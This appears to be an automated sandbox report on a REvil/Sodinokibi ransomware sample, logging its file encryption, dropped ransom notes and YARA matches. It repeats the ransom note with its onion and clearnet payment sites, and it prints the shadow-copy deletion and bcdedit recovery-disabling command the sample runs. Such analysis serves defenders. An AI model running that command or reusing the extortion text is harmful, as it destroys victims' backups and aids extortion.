              Source: C:\Users\user\Documents\QNCYCDFIJJ\985drm9-readme.txtDropped file: ---=== Welcome. Again. ===---[+] Whats Happen? [+]Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 985drm9.By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).[+] What guarantees? [+]Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money.[+] How to get access on website? [+]You have two ways:1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D6456062) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/45C1E9BA4D645606Warning: secondary website can be blocked, thats why first variant muchJump to dropped file
              Source: Yara matchFile source: Process Memory Space: RQzHm5vLxs.exe PID: 6232, type: MEMORYSTR
              Source: Yara matchFile source: RQzHm5vLxs.exe, type: SAMPLE
              Source: Yara matchFile source: 0.0.RQzHm5vLxs.exe.d90000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.RQzHm5vLxs.exe.d90000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: Process Memory Space: RQzHm5vLxs.exe PID: 6232, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RQzHm5vLxs.exe PID: 6232, type: MEMORYSTR
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile moved: C:\Users\user\Desktop\WKXEWIOTXI.pngJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile deleted: C:\Users\user\Desktop\WKXEWIOTXI.pngJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile moved: C:\Users\user\Desktop\XZXHAVGRAG\XZXHAVGRAG.docxJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile deleted: C:\Users\user\Desktop\XZXHAVGRAG\XZXHAVGRAG.docxJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile moved: C:\Users\user\Desktop\NWTVCDUMOB.pdfJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeCode function: 0_2_00D938C7 GetDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetDeviceCaps,MulDiv,CreateFontW,SelectObject,SetBkMode,SetTextColor,GetStockObject,FillRect,SetPixel,DrawTextW,SystemParametersInfoW,DeleteObject,DeleteObject,DeleteDC,ReleaseDC,0_2_00D938C7
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile dropped: C:\Users\user\Documents\QNCYCDFIJJ\985drm9-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45c1e9ba4d6456062) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decryptor.top/45c1e9ba4d645606warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:fk/hcx3ful3ygteenrbfedhyjxn2ohscloomg/g1bhf16tanvlhojygqpJump to dropped file
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile dropped: C:\Users\user\Documents\UMMBDNEQBN\985drm9-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45c1e9ba4d6456062) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decryptor.top/45c1e9ba4d645606warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:fk/hcx3ful3ygteenrbfedhyjxn2ohscloomg/g1bhf16tanvlhojygqpJump to dropped file
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile dropped: C:\Users\user\Documents\UOOJJOZIRH\985drm9-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45c1e9ba4d6456062) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decryptor.top/45c1e9ba4d645606warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:fk/hcx3ful3ygteenrbfedhyjxn2ohscloomg/g1bhf16tanvlhojygqpJump to dropped file
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile dropped: C:\Users\user\Documents\VLZDGUKUTZ\985drm9-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45c1e9ba4d6456062) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decryptor.top/45c1e9ba4d645606warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:fk/hcx3ful3ygteenrbfedhyjxn2ohscloomg/g1bhf16tanvlhojygqpJump to dropped file
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile dropped: C:\Program Files (x86)\985drm9-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45c1e9ba4d6456062) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decryptor.top/45c1e9ba4d645606warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:fk/hcx3ful3ygteenrbfedhyjxn2ohscloomg/g1bhf16tanvlhojygqpJump to dropped file
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile dropped: C:\Recovery\985drm9-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45c1e9ba4d6456062) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decryptor.top/45c1e9ba4d645606warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:fk/hcx3ful3ygteenrbfedhyjxn2ohscloomg/g1bhf16tanvlhojygqpJump to dropped file
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile dropped: C:\Users\985drm9-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45c1e9ba4d6456062) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decryptor.top/45c1e9ba4d645606warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:fk/hcx3ful3ygteenrbfedhyjxn2ohscloomg/g1bhf16tanvlhojygqpJump to dropped file
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile dropped: C:\$WinREAgent\Scratch\985drm9-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45c1e9ba4d6456062) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decryptor.top/45c1e9ba4d645606warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:fk/hcx3ful3ygteenrbfedhyjxn2ohscloomg/g1bhf16tanvlhojygqpJump to dropped file
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile dropped: C:\Users\Default\985drm9-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45c1e9ba4d6456062) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decryptor.top/45c1e9ba4d645606warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:fk/hcx3ful3ygteenrbfedhyjxn2ohscloomg/g1bhf16tanvlhojygqpJump to dropped file
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile dropped: C:\Users\user\985drm9-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45c1e9ba4d6456062) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decryptor.top/45c1e9ba4d645606warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:fk/hcx3ful3ygteenrbfedhyjxn2ohscloomg/g1bhf16tanvlhojygqpJump to dropped file
              Source: RQzHm5vLxs.exe, 00000000.00000002.2926497345.0000000000AC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ]kY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectionsionsmCertificates\TrustedPeopletoreserC:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenable

              System Summary

              barindex
              Source: RQzHm5vLxs.exe, type: SAMPLEMatched rule: Identifies SODINOKIBI/REvil ransomware Author: unknown
              Source: RQzHm5vLxs.exe, type: SAMPLEMatched rule: Identifies SODINOKIBI/REvil ransomware Author: unknown
              Source: RQzHm5vLxs.exe, type: SAMPLEMatched rule: REvil Payload Author: R3MRUM
              Source: 0.0.RQzHm5vLxs.exe.d90000.0.unpack, type: UNPACKEDPEMatched rule: Identifies SODINOKIBI/REvil ransomware Author: unknown
              Source: 0.0.RQzHm5vLxs.exe.d90000.0.unpack, type: UNPACKEDPEMatched rule: Identifies SODINOKIBI/REvil ransomware Author: unknown
              Source: 0.0.RQzHm5vLxs.exe.d90000.0.unpack, type: UNPACKEDPEMatched rule: REvil Payload Author: R3MRUM
              Source: 0.2.RQzHm5vLxs.exe.d90000.0.unpack, type: UNPACKEDPEMatched rule: Identifies SODINOKIBI/REvil ransomware Author: unknown
              Source: 0.2.RQzHm5vLxs.exe.d90000.0.unpack, type: UNPACKEDPEMatched rule: Identifies SODINOKIBI/REvil ransomware Author: unknown
              Source: 0.2.RQzHm5vLxs.exe.d90000.0.unpack, type: UNPACKEDPEMatched rule: REvil Payload Author: R3MRUM
              Source: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Identifies SODINOKIBI/REvil ransomware Author: unknown
              Source: 00000000.00000000.1664633895.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Identifies SODINOKIBI/REvil ransomware Author: unknown
              Source: RQzHm5vLxs.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: RQzHm5vLxs.exe, type: SAMPLEMatched rule: Windows_Ransomware_Sodinokibi_83f05fbe os = windows, severity = x86, description = Identifies SODINOKIBI/REvil ransomware, creation_date = 2020-06-18, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.revil, license = Elastic License v2, threat_name = Windows.Ransomware.Sodinokibi, fingerprint = 8c32ca099c9117e394379c0cc4771a15e5e4cfb1a98210c288e743a6d9cc9967, id = 83f05fbe-65d1-423f-98df-21692167a1d6, last_modified = 2021-08-23
              Source: RQzHm5vLxs.exe, type: SAMPLEMatched rule: Windows_Ransomware_Sodinokibi_a282ba44 os = windows, severity = x86, description = Identifies SODINOKIBI/REvil ransomware, creation_date = 2020-06-18, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.revil, license = Elastic License v2, threat_name = Windows.Ransomware.Sodinokibi, fingerprint = 07f1feb22f8b9de0ebd5c4649545eb4823a274b49b2c61a44d3eed4739ecd572, id = a282ba44-b8bf-4fcc-a1c4-795675a928de, last_modified = 2021-08-23
              Source: RQzHm5vLxs.exe, type: SAMPLEMatched rule: REvil author = R3MRUM, description = REvil Payload, cape_type = REvil Payload
              Source: 0.0.RQzHm5vLxs.exe.d90000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Sodinokibi_83f05fbe os = windows, severity = x86, description = Identifies SODINOKIBI/REvil ransomware, creation_date = 2020-06-18, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.revil, license = Elastic License v2, threat_name = Windows.Ransomware.Sodinokibi, fingerprint = 8c32ca099c9117e394379c0cc4771a15e5e4cfb1a98210c288e743a6d9cc9967, id = 83f05fbe-65d1-423f-98df-21692167a1d6, last_modified = 2021-08-23
              Source: 0.0.RQzHm5vLxs.exe.d90000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Sodinokibi_a282ba44 os = windows, severity = x86, description = Identifies SODINOKIBI/REvil ransomware, creation_date = 2020-06-18, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.revil, license = Elastic License v2, threat_name = Windows.Ransomware.Sodinokibi, fingerprint = 07f1feb22f8b9de0ebd5c4649545eb4823a274b49b2c61a44d3eed4739ecd572, id = a282ba44-b8bf-4fcc-a1c4-795675a928de, last_modified = 2021-08-23
              Source: 0.0.RQzHm5vLxs.exe.d90000.0.unpack, type: UNPACKEDPEMatched rule: REvil author = R3MRUM, description = REvil Payload, cape_type = REvil Payload
              Source: 0.2.RQzHm5vLxs.exe.d90000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Sodinokibi_83f05fbe os = windows, severity = x86, description = Identifies SODINOKIBI/REvil ransomware, creation_date = 2020-06-18, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.revil, license = Elastic License v2, threat_name = Windows.Ransomware.Sodinokibi, fingerprint = 8c32ca099c9117e394379c0cc4771a15e5e4cfb1a98210c288e743a6d9cc9967, id = 83f05fbe-65d1-423f-98df-21692167a1d6, last_modified = 2021-08-23
              Source: 0.2.RQzHm5vLxs.exe.d90000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Sodinokibi_a282ba44 os = windows, severity = x86, description = Identifies SODINOKIBI/REvil ransomware, creation_date = 2020-06-18, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.revil, license = Elastic License v2, threat_name = Windows.Ransomware.Sodinokibi, fingerprint = 07f1feb22f8b9de0ebd5c4649545eb4823a274b49b2c61a44d3eed4739ecd572, id = a282ba44-b8bf-4fcc-a1c4-795675a928de, last_modified = 2021-08-23
              Source: 0.2.RQzHm5vLxs.exe.d90000.0.unpack, type: UNPACKEDPEMatched rule: REvil author = R3MRUM, description = REvil Payload, cape_type = REvil Payload
              Source: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Sodinokibi_a282ba44 os = windows, severity = x86, description = Identifies SODINOKIBI/REvil ransomware, creation_date = 2020-06-18, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.revil, license = Elastic License v2, threat_name = Windows.Ransomware.Sodinokibi, fingerprint = 07f1feb22f8b9de0ebd5c4649545eb4823a274b49b2c61a44d3eed4739ecd572, id = a282ba44-b8bf-4fcc-a1c4-795675a928de, last_modified = 2021-08-23
              Source: 00000000.00000000.1664633895.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Sodinokibi_a282ba44 os = windows, severity = x86, description = Identifies SODINOKIBI/REvil ransomware, creation_date = 2020-06-18, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.revil, license = Elastic License v2, threat_name = Windows.Ransomware.Sodinokibi, fingerprint = 07f1feb22f8b9de0ebd5c4649545eb4823a274b49b2c61a44d3eed4739ecd572, id = a282ba44-b8bf-4fcc-a1c4-795675a928de, last_modified = 2021-08-23
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile deleted: C:\Windows\WinSxS\Backup\amd64_hid-user.resources_31bf3856ad364e35_10.0.19041.1_en-gb_140ae2618f6740b3.manifestJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeCode function: 0_2_00D9A3CF0_2_00D9A3CF
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeCode function: 0_2_00D972020_2_00D97202
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeCode function: 0_2_00D96FA40_2_00D96FA4
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeCode function: 0_2_00D9973A0_2_00D9973A
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeCode function: 0_2_00D977250_2_00D97725
              Source: RQzHm5vLxs.exeStatic PE information: No import functions for PE file found
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeSection loaded: drprov.dllJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeSection loaded: ntlanman.dllJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeSection loaded: davclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeSection loaded: davhlpr.dllJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeSection loaded: browcli.dllJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: RQzHm5vLxs.exeReversingLabs: Detection: 92%
              Source: RQzHm5vLxs.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\RQzHm5vLxs.exe C:\Users\user\Desktop\RQzHm5vLxs.exe
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailuresJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: C:\Users\user\AppData\Local\Temp\jyd4327.bmpJump to behavior
              Source: classification engineClassification label: mal100.rans.troj.evad.winEXE@4/211@6/5
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeCode function: 0_2_00D93E53 GetDriveTypeW,GetDiskFreeSpaceExW,0_2_00D93E53
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeCode function: 0_2_00D9457F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,0_2_00D9457F
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3384:120:WilError_03
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeMutant created: \Sessions\1\BaseNamedObjects\Global\FDC9FA6E-8257-3E98-2600-E72145612F09
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\program files\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeDirectory created: c:\program files\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeDirectory created: c:\program files\37db623e.lockJump to behavior
              Source: Binary string: \\?\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\ source: RQzHm5vLxs.exe, 00000000.00000003.2211440830.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2153961554.0000000003B73000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \\?\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: RQzHm5vLxs.exe, 00000000.00000003.2216942802.0000000003BE6000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2211386957.0000000003BE9000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2344505998.0000000003BEA000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2215318961.0000000003BE3000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000002.2928315056.0000000003BEA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \\?\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\T source: RQzHm5vLxs.exe, 00000000.00000003.2156041172.000000000257D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2153761267.000000000257D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2216977253.0000000002589000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2158945262.0000000002583000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2344713671.0000000002589000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \\?\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\g5 source: RQzHm5vLxs.exe, 00000000.00000003.2162546986.0000000003B89000.00000004.00000020.00020000.00000000.sdmp
              Source: RQzHm5vLxs.exeStatic PE information: section name: .yesewt

              Persistence and Installation Behavior

              barindex
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailuresJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: C:\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\$winreagent\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\program files\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\program files (x86)\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\recovery\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\$winreagent\scratch\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\default\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\public\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\default\desktop\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\default\documents\985drm9-readme.txtJump to behavior
